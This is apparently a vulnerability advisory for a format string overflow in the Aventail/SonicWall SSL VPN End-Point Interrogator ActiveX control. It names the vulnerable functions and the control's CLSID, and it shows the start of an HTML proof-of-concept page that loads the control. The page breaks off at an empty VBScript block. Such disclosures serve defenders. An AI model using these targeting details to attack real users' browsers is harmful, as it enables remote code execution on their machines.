background:
===========

sonicwall has added the award-winning aventail ssl vpn  product line to
our e-class sra appliances. aventail's best-of-breed ssl vpns deliver
secure remote access to the most resources from the most end point
locations. aventail was named in the visionaries quadrant in the ssl
vpn magic quadrant report from gartner, considered to be the leading
analyst firm covering the ssl vpn industry.

(product description from website)

description:
============

remote exploitation of a format string overflow vulnerability in the
end-point interrogator/installer activex control could allow an attacker
to execute arbitrary code within the security context of the targeted
user.

the affected function is "authcredential". the functions
"configurationstring" seems to be also vulnerable, but the format
string has to be base64 decoded.

name:             end-point interrogator/installer module
vendor:           aventail corporation
type:             activex-control
version:          10.3.42
prog id:          epilib.epinterrogator
guid:             {2a1be1e7-c550-4d67-a553-7f2d3a39233d}
file:             epi.dll
folder:           %userprofile%\application data\aventail\epi
safe for script:  true
safe for init:    true

proof of concept :
==================

<html>
 <head>
  <title>sonicwall e-class ssl-vpn activex control dos poc</title>
 </head>
<body>
<pre>
<img src="";>

<input type=button name="submit" value="rule #5 – shoot first">

</pre>

<object classid='clsid:2a1be1e7-c550-4d67-a553-7f2d3a39233d'
id='obj'></object>

<script language='vbscript'>